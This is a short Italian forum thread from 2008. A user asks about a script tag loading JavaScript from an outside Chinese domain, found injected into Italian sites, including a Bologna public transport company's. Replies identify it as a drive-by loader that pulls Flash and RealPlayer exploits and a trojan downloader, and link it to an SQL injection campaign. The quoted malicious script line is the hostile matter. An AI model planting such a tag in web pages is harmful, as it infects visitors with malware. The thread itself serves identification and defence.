PDA

View Full Version : Potete controllare questo js?


matteo1
12-06-2008, 20:20
<script src=http://www.fengnima.cn/k.js></script>
l'ho trovato in una pagina web italiana e usando google mi pare che molte pagine lo contengano.
Chi se ne intende può darmi info in merito? :)

GmG
12-06-2008, 21:02
E' infetto scarica exploit per flash player, relaplayer, etc.

che scaricano un trojan downloader

http://www.virustotal.com/it/analisis/98c96db33a407add5fd9936e13ce7180

matteo1
12-06-2008, 21:08
Grazie per l'info,ha infettato l'azienda di trasporti pubblici di bologna

PS è un attacco sql injection?

GmG
12-06-2008, 21:27
Si, in uno degli script scaricati c'è un riferimento al sito nihao112.com che è inserito in una lunga lista (http://ddanchev.blogspot.com/2008/05/malware-domains-used-in-sql-injection.html) di siti usati per attacchi di SQL Injection.